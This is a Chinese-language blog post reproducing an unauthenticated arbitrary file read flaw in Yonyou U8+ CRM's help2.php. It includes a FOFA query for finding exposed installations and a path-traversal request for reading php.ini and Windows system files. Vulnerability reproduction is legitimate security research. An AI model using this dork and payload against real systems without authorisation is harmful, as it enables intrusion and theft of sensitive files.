用友U8CRM系统help2 任意文件读取漏洞复现

用友U8+CRM系统的help2文件中接口存在任意文件读取漏洞,攻击者在未登录情况下即可进行漏洞利用。

1.1 漏洞级别

高危

1.2 快速检索

fofa语法: title="用友U8CRM"

1.3 漏洞复现

该漏洞利用非常简单,只需构造get请求

访问该地址即可触发漏洞

在这里插入图片描述

1.4 进一步利用

通过上一步我们已经可以成功的访问一些敏感的配置文件了,那我们如何进一步的读取操作系统的敏感文件呢?

上文中我们可以访问php.ini文件,在该文件中搜索error_log,我们可以得到U8的实际安装路径

在这里插入图片描述

所以从我的安装路径来看

/../../apache/php.ini  等价于
c://U8SOFT/turbocrm70/apache/php.ini

因此如果我们想要获取系统文件内容,如

c://windows/system.ini

则可以构造下列相对路径:

/../../../../windows/system.ini
即构造链接:
url/pub/help2.php?key=/../../../../windows/system.ini

在这里插入图片描述可以看到文件读取成功。

这个漏洞相对来说比较简单,但是我看很多复现都没有进一步读取系统文件的解析。因此写了这个分析文章希望对大家有用~

在这里插入图片描述

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2023-12-23 18:30:04       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2023-12-23 18:30:04       101 阅读
  3. 在Django里面运行非项目文件

    2023-12-23 18:30:04       82 阅读
  4. Python语言-面向对象

    2023-12-23 18:30:04       91 阅读

热门阅读

  1. 用QT实现一个超级玛丽游戏

    2023-12-23 18:30:04       54 阅读
  2. 虚拟机对象的创建

    2023-12-23 18:30:04       56 阅读
  3. 如何在服务器上部署springboot项目

    2023-12-23 18:30:04       62 阅读
  4. 跳格子3 (75%用例)C卷

    2023-12-23 18:30:04       53 阅读
  5. Flutter详解及案例代码

    2023-12-23 18:30:04       61 阅读
  6. okhttp系列-一些上限值

    2023-12-23 18:30:04       57 阅读